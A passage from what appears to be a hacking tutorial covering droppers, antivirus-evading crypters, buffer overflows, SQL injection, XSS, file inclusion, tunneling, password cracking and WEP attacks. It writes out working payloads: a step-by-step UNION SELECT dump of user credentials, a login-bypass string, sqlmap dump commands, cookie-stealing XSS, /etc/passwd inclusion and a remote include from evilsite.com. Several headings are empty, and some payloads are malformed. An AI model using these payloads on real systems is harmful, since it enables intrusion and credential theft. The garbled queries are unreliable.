Droppers are programs that contain no malicious code but, go out to the internet and download and
execute a malicious program.

Theory
Droppers are a semi competent threat, despite being picked up by anti-viruses most of the time.
However, the age old rule applies that, the longer a dropper has been around, the more susceptible it is
to being caught. Newer droppers might not have this problem.
They are dangerous because an anti-virus can't keep tabs on everything running on a computer in realtime. Abusing this, a dropper downloads a program inconspicuously and then runs it.

Crypters
Crypters are programs designated to encrypt an executable so an anti-virus may not pick it up.

Theory
Crypters work by encrypting an executable using any number of methods and then, affixing a program,
called a stub, to the front of it to decrypt the code. This allows us to have better control over the
conditions our code runs in and, ensure undetection by way of hiding our executable in other processes.

30

The Encrypter
The encrypter works in this fashion:
1. Generate a stub source code file.
2. Compile the stub.
3. Place the stub at the beginning of a file.
4. Place a unique separator after the compiled stub.
5. Open a malicious executable.
6. Encrypt this executable.
7. Place the encrypted executable at the end of the file.
When the executable is run, the stub springs into action and decrypts and runs the code.

The Stub
A stub works like this:
1. Find the current directory of the process.
2. Open the executable.
3. Look for the unique separator.
4. Take only the encrypted executable and save it.
5. Decrypt the executable.
6. Inject the decrypted executable into a random process but, first, try to inject into explorer.

Antis
Antis are functions in a crypter that stop the executable from running if certain programs are running.
For instance, a common anti is to stop the execution of the program if you are inside a VMWare virtual
machine. Another is to not run if Sandboxie is running. Antis are generally a smart idea if you are
afraid that your executable might come under suspicion at some point.

Junk Code

Buffer Overflows
This attack are one of the most commonly exploited attack according to OWASP. This attacks potency
can range from a DoS attack to a full system compromise, making it a dangerous vulnerability to have
present.

31

Theory
Buffer Overflow An exploit that presents itself in C/C++ languages but, theoretically, can be
exploited in any language that allows a program to commit data to memory without first checking the
bounds of said data. A buffer overflow occurs when a program commits user input to memory without
first checking the bounds of that data. When committed to the stack it causes a segmentation fault. This
results in a crash under normal circumstances. However, in an attack, an attacker can overwrite the EIP
register using the return value on the stack, allowing an attack to gain control of program flow.
Depending on the severity of the exploit and the protections in place, exploiting it may be different
under each circumstance.
Consider this code.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char buffer[8];
st

strcpy(buffer, argv[1]); //Moves 1 arg into buffer


printf("buffer is %s%n", buffer);
printf("DONE!%n");
return 0;
}

This code creates a buffer which accepts 8 characters. However, there is no bounds checking done. As a
result, an exploiter could input over 8 characters into the buffer and, have it still write to memory. This
could possibly allow an attacker to take control of the program flow.

Protections
As a result of widespread exploitation, many protections have been developed to combat exploitation.
ASLR Stands for Address Space Layout Randomization. This protection randomizes the top bit of
program code, and the stack, making it harder for exploiters to reliably locate certain lauchpad
commands. It's extremely popular and used in almost everything.
DEP Stands for Data Execution Prevention. This comes in two forms, hardware and software, and is
controlled by the /NX flag. The hardware version disables executable memory, stopping exploits from
succeeding. A developer can still set certain memory areas as executable, in case they need to execute
data from it. Software DEP is analogous to SafeSEH.
Stack Cookies Controlled by the /GS flag. This puts a random 8 byte key before the saved EIP in the
stack. Before a return is called, the program checks the key against on in the system. If they don't
match up (meaning a overflow occurred and EIP is modified), it stops execution and terminates the
program to prevent exploitation.

32

SafeSEH/SEHOP - A compiler option that sets a linked list of SEH pointers. If a SEH pointer doesn't
match up with the list, it is not executed and the program is terminated.
NoSEH This disables SEH, stopping exploits that rely on it.

Common Attacks
Despite the ample amount of protections, they aren't all fool-proof.
Launchpad This technique is used to bypass ASLR. Due to the stacks address randomization, you
can't directly jump EIP to the top of the stack, since the address won't be the same after reboot. Instead,
you find a non-ASLR module and search for a JMP ESP command. Using this, you can jump to the top
of the stack reliably.
SEH Overwrite This takes advantage of SEH chains with no protections. You overwrite an SEH
pointer with your own code, letting it go to a launchpad.
Egghunters An egghunter is a piece of shellcode meant to rip through pages in memory looking for a
specific pattern called an egg key,. This egg key is usually 8 bytes in length. Skape wrote a large paper
on the subject, detailing different methods one could use to rip through memory without triggering
exceptions.
Bypassing Stack Cookies Stack cookies are a huge problem for exploiters as it is difficult to get
around them. The easiest method is to overwrite the SEH chain and then trigger an exception before the
check method is reached. This method is easily broken by SafeSEH or NoSEH.. The other way is to
figure out a way to guess or calculate a stack cookie. Skape also wrote a piece on reducing the effective
entropy of a stack cookie.

Problems
Bad Characters Bad characters are bytes that have special meaning or, are specially filtered out or
transmuted during an exploit. Common ones are 0x00, 0x0a, 0x0d. 0x00, for example, is a C++ string
terminator and when used in an exploit, deletes everything past the 0x00 byte. 0x0a and 0x0d are
carriage return and line feed characters.
Null Byte Addresses Main program code (code contained within the executable itself) starts at
0x00??0000. As a result, one cannot use address from the main executable as the will contain a 0x00
byte.
Character Transmutation This is a problem that happens when a buffer is first filtered or encoded
before committing to a buffer. For instance, a program that might strip out any non-ASCII characters
(00-7F). Anything higher will get transmuted. This also happens in UNICODE to ASCII translation as
well.

Fuzzers
Fuzzer A debugging program made to find buffer overflows by varying buffer size.
SPIKE - A well made fuzzing application. It has it's own scripting language.
Sfuzzer A simple fuzzer meant to be a easier solution to SPIKE.

33

Fuzzing works by passing commands to a server with varying data sizes. If the program crashes during
a fuzz, it is possibly vulnerable to a buffer overflow. For instance, take a program that accepts network
data and then copies this data to the stack. A fuzzer will try A x 20 for the data. If that doesn't crash it, it
will send A x 40, and so on and so forth. If the program does no bounds checking, it will eventually
crash when the buffer size gets to big and overwrites EIP.

Web Based Attacks


Web based attacks are a very large set of attacks that can be performed on web applications. Often,
these attacks involve a program not sanitizing user supplied data correctly.

Zero Frames and Zero Images


Zero frames and zero images are a form of obscuring attack HTML from the view of a webpage. Zero
frames are created by setting an iframes width and height to zero or one, resulting in a webpage being
rendered that a user cannot see. This is a common way for attackers to hide malicious code in
legitimate webpages, infecting users without their knowledge.
<iframe height=0 width=0 src=http://evilsite.com></iframe>

Zero images work on the same principle but, instead, with an image. You can't render an entire
webpage with it though. It is more commonly used to exploit cross site request forgery attacks.

Command Execution
Command execution takes advantage of unsanitized user input, which allows an attacker to inject
commands directly into the server. This vulnerability usually takes advantage of a shell_exec() function
in PHP.
Command execution techniques vary from OS to OS. Linux, for instance, with zero user input
sanitation could be compromised with.
[space]&[space][command]; [command];

However, be aware that in most scripts, you may have to satisfy certain requirements before the input
will be passed along.

Cross Site Request Forgery


Cross Site Request Forgery or CSRF, is an attack that abuses authentication mechanisms that allow
users to stay logged in even after the website is closed from the browser. CSRF allows an attacker to
force a user to perform actions without their knowledge or consent. How it works is, an attacker makes
a URL that links to an action performed on a site. For instance,
http://www.vulnsite.com?password=ichangedthis&passwordconf=ichangedthis&submit=submit

This example, if opened by a authenticated user, would change their password to ichangedthis. If the
links is opened directly, this would show the user the action was performed. A better way to do it is to
34

wrap the URL in <img> tags to make a zero image. This would result in a hidden image that, when
loaded, would cause the action to be performed without the users knowledge. You can also use a zero
frame for this.

File Inclusion
These attacks revolve around files being included in PHP without restriction.
http://vulnerablesite.com?page=include.php

This kind of attack contains two types of attacks, LFI (Local File Inclusion) and RFI (Remote File
Inclusion).

Local
A LFI takes advantage of the ability for one to traverse directories locally, without interference, on the
system. As a result certain files could be given to the attacker like, for instance, the /etc/passwd file on
linux.
http://vulnerablesite.com?page=/etc/passwd

Remote
A RFI takes advantage of being able to load other files into the include. This can be more dangerous, as
it can allow an attacker to run commands using the shell_exec() function in PHP.
http://vulnerablesite.com?page=http://evilsite.com/evil.php

SQL Injections
A form of attack meant to pass commands directly to an SQL server by using escape characters and
malformed input. It can also be used to bypass authentication mechanisms by way of forcing a field to
be true. It can also trick an SQL server into revealing database information.

URL
Say we have a site.
www.vulnsite.com

This site loads a page called updates.php in which the URL passes parameters to.
www.vulnsite.com/updates.php?id=1

Here we can pass parameters to the PHP application by changing the 1 in the URL to whatever we
want. From here, we can begin testing to see if the site properly filters user input. It's easy to check this
by passing the application a character that would raise an exception in the MySQL database. We can
achieve this with a single quote ( ' ) character.
35

www.vulnsite.com/updates.php?id=1'

We can tell if the application is vulnerable if an error is thrown.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ''' at line 1

We can see that user input is not filtered properly and, as a result, we will be able to inject our own
SQL statements.
First, we need to identify how many columns are in the table that controls the data on the page. We can
do this by issuing commands tot he server via the URL, that will throw an error if a column does not
exist. The ORDER BY statement will work for this.
www.vulnsite.com/updates.php?id=1 ORDER BY 1;#

Alternatively, you can also use


www.vulnsite.com/updates.php?id=1 ORDER BY 1--

This will most likely produce no errors, as the database will more than likely have more that one
column. We slowly increase the amount until an error is thrown.
Unknown column '20' in 'order clause'

Once we get the error, we can infer that the table has one less than the page that threw the error, since it
worked before the number was increased again.
Once we know this, we can begin injecting data directly into our page in attempt to find vulnerable
columns. The goal is to find someplace on the page to display the data we will be collecting later. We
do this with a UNION SELECT statement. We for the statement with as many columns as we found.
www.vulnsite.com/updates.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8;#

Also note that we change the page id to one that is not likely to exist, -1. This allows us to easily
identify vulnerable columns.
Upon doing this we can inspect the page and see some of the numbers in our UNION SELECT showed
up on the page. These numbers represent our vulnerable columns. We can inject commands and use
these vulnerable columns to render this data visible to us.
We can inject a variety of commands in here to better understand the back-end servers.
For this example, we will pretend 1,2 and, 3 are all vulnerable columns.
www.vulnsite.com/updates.php?id=-1 UNION SELECT @@VERSION,USER(),DATABASE(),4,5,6,7,8;#

This will put the current database version number in column one, the current database user at column
two and, the database name at column three.
Next we are going to want to get the table names from the information_schema. Please be wary of the
version number, MYSQL 4 will not let you read from the information_schema without elevated
privileges.

36

www.vulnsite.com/updates.php?id=-1 group_concat(table_name),@@VERSION,DATABASE(),4,5,6,7,8
from information_schema where table_schema=database();#

This will stuff the table names, separated by commas, into a vulnerable column. This allows us to see
all the tables that we may want to compromise. By using this, we can begin to enumerate the contents
of the tables.
For this example, we will pretend that the tables listed were content, users, and admin.
www.vulnsite.com/updates.php?id=-1 group_concat(column_name),2,3,4,5,6,7,8 from
information_schema.columns where table_name=users;#

This will tell us all the column names for the table users. Once we get these, we can begin pulling out
relevant information.
For this example, we will pretend the columns listed for users were, username, password, email, and id.
www.vulnsite.com/updates.php?id=-1
group_concat(username,0x3a,password,0x3a,email,0x3a,id),2,3,4,5,6,7,8 from users;#

This prints all the table data to the screen and, separates each column with a colon (0x3a).
Here we have completed our attack and, accessed the previously hidden table data.

Authentication Bypass
This kind of attack is done by forging SQL queries that will always return true. This way we can bypass
the login of a site, allowing us access, without a legitimate account.\
An example would be a site that takes both a username and a password.
Upon putting in a correct username and password, a user can get in. Upon putting in a wrong username
and password, a person is denied access.
This is done through an SQL query similar to this.
SELECT * FROM users WHERE username='$user' and password='$pass';

By escaping the quotes, we can authenticate ourselves without even knowing the password and
sometimes, even the username.
A simple authentication bypass statement would look like this.
User: admin Password: 1' OR '1' = '1';#

This would make the statement:


SELECT * FROM users WHERE username='admin' and password='a' OR '1' = '1';#';

Since the end quote and semicolon are commented out, the statement's syntax is correct. Above that, we
can see that the statement in the password section will always equal true, since 1 is always equal to
itself.

37

Blind

SQLmap
SQLMap is a tool for automated SQLi attacks. This will automatically find and pull vulnerable
columns, and also, display the data from the tables it enumerates.
First off we need to use SQLmap to get a list of the databases.
./sqlmap.py -u http://vulnsite.com/updates.php?id=-1 dbs

This will brute force the available databases, allowing us to continue with our next step, enumerating
the tables.
./sqlmap.py -u http://vulnsite.com/updates.php?id=-1 -D [database] tables

Lastly, we can dump a tables contents using the dump option.


./sqlmap.py -u http://vulnsite.com/updates.php?id=-1 =D [database] -T [table] dump

Cross Site Scripting (XSS)


Cross site scripting or XSS allows an attacker to inject code into URLs or webpages. These attacks
often lead to mass compromises, since the attacker can upload things like java drive bys into a
reputable website. These attacks commonly are used to steal authentication cookies, allowing an
attacker to impersonate a victim.

Non-Persistent
These attacks aren't as bad as a persistent attack but, can be just as damaging.
The attack involves abusing some form field or URL parameters that are not sanitized. This allows an
attacker to craft a special URL that when the victim opens, will reflect attack code onto the webpage.
This kind of attack is the most popularly exploited.
It involves storing code in the URL parameters, allowing an attacker to give a specific URL to people
and, when the follow it, it will render attack code on the page.
www.vuln.com?updates.php?location=<p>EVIL CODE HERE!</p>

Persistent
Persistent XSS attacks allow an attacker to post client-side code directly into the webpage. This has
obvious malicious implications as anyone who visits that site can become compromised.
For instance, imagine a website that takes a comment and posts it onto a webpage. An attacker could
store HTML code into the comment, of proper character checking is not in place.
For example an attackers comment could be:
38

<P>EVIL COMMENT</P>

However, that is not malicious but, does allow us to test the problem. We can be more malicious with:
<Script>
alert(document.cookie);
</Script>

This will display the current cookie for the domain.


In some cases the script tags can be filtered out by a script. However, script tags aren't the only
dangerous thing.
<a href=Fake.html onHover=javascript:alert(document.cookie);>FAKE</a>

This will run javascript if the link is hovered over. Other methods could be iframe or zero image
attacks.

Web Based Exploitation Frameworks


OWASP Mantra

Port Tunneling
Port Tunneling Redirecting network traffic to a port or proxy as to avoid detection, firewalls, or
network blocks.

Theory
In the following example the attacker is in the cloud and the victim is behind a firewall that blocks all
traffic in port X.
Tunneling works like so:
1. The attacker connects and sends data to the proxy on port X.
2. The proxy then forwards the data from port X to port Y.
3. The victim receives the data on port Y and send out a reply through Y.
4. The proxy forwards the data from port Y to port X.
5. The proxy sends the data through port X to the attacker.
In this example there is a middle man (The proxy) which redirects all the traffic. This helps the attack
communicate with the victim because the firewall block all traffic on X but, not on Y.
This also can help to protect your anonymity.

39

HTTP CONNECT Tunneling


HTTP CONNECT has a wonderful feature where we can tunnel traffic over HTTP to a specific port.
This uses a server as a proxy to reach the internet.
All we do is netcat into a HTTP CONNECT server and type the following:
HTTP CONNECT [server]:[port} HTTP/1.0

SSL Tunneling
SSL Tunneling is a technique to add SSL functionality to programs or protocols that normally don't
have SSL. This is useful when in an environment that might have certain SSL ports blocked or, you
have a need to have a secure communication between protocols that have no encryption. However, the
accepting party must have SSL enabled on their server or it will just drop the SSL traffic. This can be
done by either setting SSL up for a specific protocol or, setting stunnel in server mode.

stunnel
stunnel A free port forwarding tool. It is used as a wrapper to encrypt incoming and outgoing
network traffic using SSL.
Stunnel also lets us bypass firewalls and IDSs since the traffic is encrypted and, we can send it through
a legitimate SSL port such as 443.
Stunnel's configuration file is located in /etc/stunnel/stunnel.conf.
Once we have edited the configuration file, we can start stunnel using
stunnel4

Be sure you have a certificate file and, it is pointed to in the stunnel configuration file.

SOCKS
SOCKS is a proxy server that allows all port traffic through, allowing for a more comprehensive sense
of anonymity.

SSH Tunneling
SSH Tunneling A tunneling protocol that connects to a computer using SSH and then redirects traffic
from the SSH session to a port. Since the client is not only the client but, also the middleman, it makes
things much faster.

Local
Local SSH port forwarding involves redirecting traffic from a port on the client and forwarding it
through the SSH session to a local port on the ssh server.
ssh -L [local-port]:localhost:[server-port] [host]

40

This will redirect 8080 on the client to the servers port 80.

Remote
Remote port forwarding allows you to connect to a SSH server through another SSH server
ssh -R [local-port]:localhost:[server-port] [host]

This would let the host connect to your port through the SSH tunnel by pointing his client to
localhost:5900

Dynamic
This lets us forward all traffic through SOCKS and is a wonderful solution for complete network
security.
ssh -C -D [port] [host]

With this we can easily set up most clients to use the proxy settings and be allowed full anonymity.

Tor
Tor A system of proxies acting as nodes to protect anonymity and information. All the data is
encrypted over the tor and it provides good route security.

Theory
Tor works by not just using one proxy but, by using many in a route sequence. Tor uses a large amount
if nodes. In every connection a random route is chosen, ensuring that anonymity is kept.

Installing

Using

Authentication Vulnerabilities
Theory
Authentication mechanisms are something that must be treated with the utmost security and
cautiousness. However, some technologies still used today have extremely weak authentication systems
in place. Often, some services send data completely in plain-text.
41

Problems With Networks


The big issue with networks is that someone can insert themselves in between a client and a server,
allowing them to hear all traffic between them. Despite this there are secure ways of exchanging
information even if a third party is listening.

Plain Text
This is the most vulnerable to attack. Usernames and passwords are sent in plain-text, allowing anyone
to listen in. While this is the easiest to implement, this is the least secure.
FTP, POP, SMTP, and HTTP all use clear text systems.

Hashing Systems
Hashing systems involve encrypting a password one way. This means that I can turn a password into a
hash but, I can't get a password back if I only have the hash. This adds a layer of security but, is a
flawed methodology. Since the hash is as good as the password itself, it is considered just as good. As a
result, one only needs to obtain the hash and they can compromise a user account.
SMB uses a hash system.

MD4

DES

MD5

SHA1

NTLM

MYSQL

Challenge Systems
Challenge systems take a better step in the right direction, however, can be flawed as we will see in the
42

here be dragons section. Challenge systems build upon the hash system. When a computer comes to
connect to a server, the server asks for the password and gives the client a challenge. This challenge can
be any length but, for the sake of pacing, it will be only 4 characters longs. So the server gives the
client the challenge 4444. The client then takes the password hash and one way encrypts it again, now
using the challenge. The client sends the challenge/hash text back and the server compares the
encrypted hashes. Challenges are randomly created at the time of connection.
Basically, the third party only gets the challenge and the encrypted hash. Since the encryption is one
way, they can't do much with it. This also breaks most brute-force, dictionary,and rainbow table attacks
as the client now has much more to do than just sending the password, he has to hash the password and
then encrypt it using a challenge. This boosts the instruction amount, making it take much longer.
Common ways around this are to force a client to connect to you and send them the insecure challenge
1234. People have written tools and crackers based around this insecure hash and, as a result, one can
often guess the password.
SMBv2 users a challenge response system.

Uneven Algorithms
Uneven algorithms are the hardest to break and, involve a high amount of security. This involves
creating two sets of keys, a public and private key. The public key is given to the client while, the
private key is kept for oneself. The public key is used to encrypt data, while, the private key is used to
decrypt it.
The only thing the attacker can gain is the public key, which can only encrypt data, therefore being
worthless to the attacker.
SSH uses uneven algorithms to encrypt data.

Here Be Dragons
This section is about mistakes made in the industry over the years but, mostly criticizes Micro$oft.
Back in 2008 Microsoft released a patch for a vulnerability called the SMB credential reflection attack.
The attack was made popular by the Metasploit module made to leverage the vulnerability. Since SMB
uses a hashing system, the hash is as good as the plain-text password. As a result, someone found that
you could trick a computer into giving up the username and password hash of a victim. The attack
worked by referencing a SMB share in a webpage by way of <IMG> tags. When the victim loaded up
this webpage the computer attempted to access this share by first trying a users name and password. All
that was needed by the server is to reflect the information back and they would have access to the users
account. A patch was eventually released.
Later in 2011, a person on exploit-db came forward with an attack aimed at SMBv2. This vulnerability
leveraged an attack on the way SMBv2 handles challenges. The challenges weren't truly random and,
as a result, an attacker could use this to gain access to the system.
How it works is, an attacker first attempts a connection to an SMB server. The server offers it a
challenge, and then stores it. It then makes a new connection and gets a new challenge. It repeats this
until it has around 8000 challenges. Then, the victim opens their web browser and is sent to a webpage
with a refreshing javascript image linked to the servers SMB share. When the victim connects it offers
43

it a challenge that it got previously. It does this until it collects all the challenge, encrypted has
combinations. Then, the server connects back to the victim and keeps reconnecting until it gets a
challenge it knows the answer to. It then replays the hash and gains access.
This was a huge mistake on Micro$oft's part as twice their default service has had huge gaping
authentication holes that were leveraged in very similar ways.
The moral here is to figure out what the problem really is. The problem here wasn't nessicarily the
authentication system but, the fact that images could be linked to SMB shares in HTML. Microsoft
could have easily disabled this as no-one uses this feature. Instead they beefed up security but,
ultimately left this huge gaping hole and, they paid for it.

Password Attacks
Passwords are one of the weaker links in the security chain, and often times, we must add huge
amounts of security to password systems to ensure there are protections for users. Most breaches are of
those involving passwords, since humans will often use the same weak password for every account
they own, allowing an attacker to breach all of their online accounts.

Theory
Password attacks often involve a form of password guessing, either online or offline. Some users can
be easily profiled for their passwords, making this significantly easier. Others may have passwords that
can't be profiled but, easily guessed or, compromised in a different fashion. Others might have secure
passwords but, are still vulnerable to guessing attacks or, the password hash is easily available,
allowing an offline attack. As a result, password systems can often be defeated if simple systems aren't
put in place to mitigate attacks.

Strong Vs. Weak Passwords


Weak passwords often have many associated weaknesses that can make them easily guessed.
Weak passwords often times:

are a single word

less than 10 characters

use only one character set (Ex: A-Z only)

These characteristics make them easily guessed and, dangerous.


A strong password usually has these characteristics:

Multiple words

more than 10 characters

uses more than one character set (Ex: a-z,A-Z,1-9,symbols)

Some examples of weak and strong passwords.


44

Weak

Strong

easy

N0ts034sy!

weakpassword

5T0n9P4$$w0rD**

Brute Force
Brute-forcing is a password attack that guesses the password by starting at a base and adding one
position to the password until it gets the right one. These attacks can take a while, especially when
passwords have a high character count.
This attack can be done in both online and offline attacks. However, it is most suitable for online as,
there are better and faster ways to get a password in an offline situation.
Ways to mitigate this is to either, make a large instruction set for sending the password, such as having
to encrypt the password using a Caesar cypher according to the current server date. This ups the
instruction count, making it take longer. Another way would be to implement a lockout of the service
when a certain amount of tries are used. Linux handles this by making it so the hashes can only be
compared every 5 seconds, so when a password is guessed wrong, they can't compare again until the
time limit is up.

Dictionary
Dictionary attacks are done using a wordlist, which is a giant list of possible passwords. The attacker
goes through each list and attempts to find a valid password. The wordlist can be any size, however,
they often use only dictionary words and common passwords.
This attack can be done in both online and offline attacks. It is a suitable attack for both, however has a
low yield, since the password might not be on the list.
You can mitigate this attack with most of the techniques in the brute-force section.

Rainbow Tables
Rainbow tables are an offline only attack that is considered the best solution for offline attacks. It
involves creating a giant list of all the hash, plaintext password possible for a given set, such as
characters a-z,A-Z,1-9,0,symbols up to characters 1-10. This could crack just about any password in
our set, up to 10 characters.
Brute-force and dictionary attacks both cost a lot CPU wise, rainbow tables relieve some of the load
but, take up a lot of space o disk. The table mentioned above would be roughly 250GB-500GB in size.
Rainbow tables take a long time to generate and, as a result, most are paid for. However, there is a
group that makes them for free by using the community as a giant cluster.

GPU Cracking

45

Misconceptions
In all actuality, the guidelines I gave earlier for strong passwords are actually a little off. The truth is
that the passwords I listed as strong passwords, aren't so strong but, in the scheme of things, can be
OK for some applications.
Consider this character set which we will call the Strong Character Set (SCS):
a-z, A-Z, 1-0, symbols(!@#$%^&*()-+_=?)

The total amount of characters in the set:


a-z = 26
A-Z = 26
1-0 = 10
symbols = 15
Total: 77

Now consider a character set aptly named the Weak Character Set (WCS):
a-z,1-0

The total number of characters in the set


a-z = 26
1-0 = 10
Total: 36

First off, we will make a password fitting the guidelines of the first section and, follows along with the
character set SCS, M0un741n5**.
First thing we should talk about the is the cons of this password. It's difficult to remember. It contains a
huge character set and a lot of confusing symbols. In fact, I'm willing to make a bet the most people
won't be able to remember if the o in password was a 0 or an o. However, lets take a look at how long it
would take to crack the password containing these guidelines, brute-force style.
M0un741n5**
Chars: 11
Character set length: 77
Entropy of each character: We will assume 2
Total bits of entropy: ~28 (I made a pretty generous addition in it's favor)
Amount of guesses needed: 2

22

Time needed to crack: About 3.1 days at 1000 guesses a second.

Now lets make a password using WCS but, we will up the character count, allowing us to make a more
secure password.
First, lets take a phrase and remove all the spaces, and then tack the number of words in it to the end,
for this example it will be, thispasswordseemsunsecure4.

46

thispasswordseemsunsecure4
Chars: 26
Character set length: 36
Entropy of each character: We will assume 1.5
Total bits of entropy: ~54
Amount of guesses needed: 2

54

Time needed to crack: So long, I couldn't even calculate the time.

This password is easy to remember and, is hard for computers to guess.


XKCD made a joke about this in a comic, the punchline says, Over the past 20 years, we've taught
people to use passwords that would be hard for humans to remember and, easy for computers to guess.

hydra

xhydra

medusa

ncrack

Wireless Attacks
Theory
Wireless attacking has become extremely popular in the last couple of years due to it's extreme
popularity and lax security standards. The biggest issue is that, unlike wired networks, it is easy to
listen in on all communication that transpires between a client and an access point.

WEP
Wired Equivalent Privacy or WEP was the first wireless privacy standard to be released. In it's
beginnings, many white hat researchers wrote papers detailing WEPs huge gaping flaws however, their
security concerns were ultimately ignored. WEP still remains the most popular wireless security
standard despite being hard to use, having cryptic keys, and is easily broken.
47

WEP can have multiple keys, however, this does not make the point more secure.
WEP works by encrypting the password with an RC4 symmetrical key.
The frame body of the packet contains an initialization vector or IV, the encrypted data, and an integrity
check value or ICV which is an encrypted checksum. The IV is 3 bytes and ICV is 4 bytes in length.
IVs are generated randomly and prepended to the packet. IVs work as a cryptographic salt and are also
used in packet generation. During packet generation, the IV is prepended to the WEP key, then
encrypted using the RC4 algorithm.
The RC4 algorithm is made up of two processes, a Key Sharing Algorithm (KSA) and a PsuedoRandom Generation Algorithm (PRGA).
Next an ICV is formed on the data, allowing it to be checked for integrity. The data is prepended to the
ICV. This concatenated data is then XORed with the RC4 encrypted IV/WEP key combo. Afterwards,
the IV is again prepended to the encrypted data.
The finalized packet looks like this.
Not Encypted
IV (3 bytes)

Encypted
Data

ICV (4 bytes)

WEP Cracking
Cafe Latte
Cafe Latte is an attack that was mainly performed in coffee shops but, can be performed anywhere
there is a computer attempting to reach a wireless network that is no longer in range. The attack
involves a computer broadcasting that it is looking for a specific network. An attacker can pretend to be
this network get the access point to give up the wireless password.

ARP Replay

Korek's Chop Chop Attack


Korek's Chop Chop Attack was an attack that allows the decryption of packets due to a flaw in packet
validation on the AP's part.
The attack works by first obtaining an encrypted packet. The packet is split up into 3 parts, the IV, the
encrypted data, and the ICV. The attacker then chops off the last byte and, sets the byte to 00. It then
recalculates the ICV using a special method Korek invented.
Once the ICV is recalculated, it is sent back to the AP. If the byte was right, the AP will say it is correct,
if it is not, the AP will tell the attacker the packet was wrong. The attacker then increments the 00 byte
and, resubmits. It does this until it gets a correct response. It then moves to the next byte, doing the
procedure over and over until it has fully decrypted the packet.

48

The attack manages to guess each byte within 128 tries, since the max it can go is 256. This attack can
eventually yield a password, if done correctly.

Hirte Attack

Fragmentation Attack

WPA

WPA Cracking

WPA2

WPA2 Cracking

DoS Attacks
Deauthentication Attacks

Man In The Middle


The wireless man in the middle attack abuses computer trust for wireless access points. The attack
revolves around the fact that a computer will auto-connect to an access point that is the closest signal
and if it is already known.

Social Engineering

49